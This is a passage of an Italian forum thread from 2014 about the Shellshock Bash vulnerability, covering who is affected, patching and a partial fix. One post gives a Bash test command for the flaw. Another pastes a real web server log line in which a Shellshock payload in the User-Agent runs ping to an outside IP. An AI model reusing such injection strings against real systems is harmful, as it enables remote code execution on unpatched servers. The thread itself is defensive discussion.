|
![]() |
#31 |
Aka -]NeMo[-
Join Date: Nov 2000
Location: Magnagatti DOC
Posts: 34,826
|
Non capisco di che parlate ma mi state facendo paura
![]() C'è un buco su Bash? Chi è che deve preoccuparsi?
__________________
_██_ .o_ರೃ INDEED. |
![]() |
![]() |
![]() |
#32 |
|
Si deve preoccupare chiunque.
Gli utenti però possono solo incrociare le dita e sperare in un patching veloce. E' inutile cambiare password o qualsiasi altra azione. Comunque anche chi usa qualsiasi *nix come client (quindi linux, osx, *bsd, android, ios, router vari) deve patchare appena viene rilasciato il fix. PS. come già detto hanno rilasciato un fix temporaneo ma non copre completamente la vulnerabilità
__________________
>> We are the music makers, And we are the dreamers of dreams,
Wandering by lone sea-breakers, And sitting by desolate times;— |
![]() |
![]() |
![]() |
#33 |
Istigatore alla derisione
Join Date: Sep 2013
Location: Zendikar
Posts: 511
|
Alla faccia di quelli che dicevano che Heartbleed era pericoloso
![]() Ma com'è che non è ancora venuta fuori in massa sta notizia? Ho aggiornato ora Arch e di conseguenza bash ma metà falla è ancora scoperta ![]() ![]() ![]() Last edited by Ryoichi-Kun; 25th September 2014 at 14:10. |
![]() |
![]() |
![]() |
#34 |
|
In other news, avere un qualsiasi nexus è improvvisamente diventato utile:
http://www.kali.org/kali-linux-nethunter/ ![]() Perché non è facile da spiegare alle pecore.
__________________
>> We are the music makers, And we are the dreamers of dreams,
Wandering by lone sea-breakers, And sitting by desolate times;— |
![]() |
![]() |
![]() |
#35 |
:3
Join Date: Apr 2003
Location: ಠ_ಠ
Posts: 16,640
|
io ho aggiornato bash e mi sembra patchato anche il 2 test
Code:
env X='() { (a)=>\' bash -c "echo date"; cat echo bash: X: line 1: syntax error near unexpected token `=' bash: X: line 1: `' bash: error importing function definition for `X' date cat: echo: No such file or directory
__________________
- If you're playing poker and you're also drunk then by many conventional measures you're already a winner. |
![]() |
![]() |
![]() |
#36 | |
Registered User
Join Date: Feb 2010
Posts: 11,933
|
Quote:
__________________
We don't get old because of age, we get old because we stop playing. |
|
![]() |
![]() |
![]() |
#37 |
( ͡° ͜ʖ ͡°)
Join Date: Dec 2008
Location: Jerusalem
Posts: 12,127
|
ma un link? fix per cosa?
__________________
Uplay: NGI-Larios Origin: rummo-pasta |
![]() |
![]() |
![]() |
#38 | |
|
Quote:
e io che volevo leggermi la nuova e aggiornata e bellissima guida al testing owasp: https://www.owasp.org/images/1/19/OTGv4.pdf ![]() scorri il thread
__________________
>> We are the music makers, And we are the dreamers of dreams,
Wandering by lone sea-breakers, And sitting by desolate times;— |
|
![]() |
![]() |
![]() |
#39 | ||
Istigatore alla derisione
Join Date: Sep 2013
Location: Zendikar
Posts: 511
|
https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c23
Quote:
Quote:
![]() Last edited by Ryoichi-Kun; 25th September 2014 at 14:41. |
||
![]() |
![]() |
![]() |
#40 |
...
Join Date: Oct 2011
Location: in deep seas
Posts: 1,023
|
questo è gravissimo... una falla enorme altro che "heart bleed"...
signori chiudete i boccaporti, ai posti di combattimento...
__________________
--- Last edited by FrancisDrakeZ; 25th September 2014 at 14:37. |
![]() |
![]() |
![]() |
#41 |
pondering...
Join Date: Mar 2004
Location: Corte di Azathoth
Posts: 7,150
|
Io ho la zsh 5.0.6 come shell per il mio utente e NON sembra funzionare (ovviamente le bash sono vulnerabili).
Comunque sono spaventato dal fatto che sembrano girare già exploit remoti per webserver basati sul un user-agent o cookies etc. crafted per http ma si parla anche dello UserAgent ssh. ![]() ![]()
__________________
Unisciti a [email protected] "All science is either physics or stamp collecting."
-- Ernest Rutherford Last edited by Nyarlathothep; 25th September 2014 at 14:45. |
![]() |
![]() |
![]() |
#42 |
pondering...
Join Date: Mar 2004
Location: Corte di Azathoth
Posts: 7,150
|
Tanto per dire, questo è stato preso ora nei log del mio webserver.
Stanno sicuramente facendo scan e usano il ping per riportare alla base. 89.207.135.125 - - [25/Sep/2014:07:52:36 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
__________________
Unisciti a [email protected] "All science is either physics or stamp collecting."
-- Ernest Rutherford |
![]() |
![]() |
![]() |
#43 |
zeta
Join Date: Dec 2005
Posts: 13,798
|
non ho ben capito una cosa. per modificare una variabile di ambiente in bash, non bisogna avere l'accesso alla shell o comunque al filesystem?
|
![]() |
![]() |
![]() |
#44 | |
|
Quote:
è bene implementare delle regole apposite per bloccare tutte le richieste
__________________
>> We are the music makers, And we are the dreamers of dreams,
Wandering by lone sea-breakers, And sitting by desolate times;— |
|
![]() |
![]() |
![]() |
Tags |
hostatobucato |
Thread Tools | |
Rate This Thread | |
|
|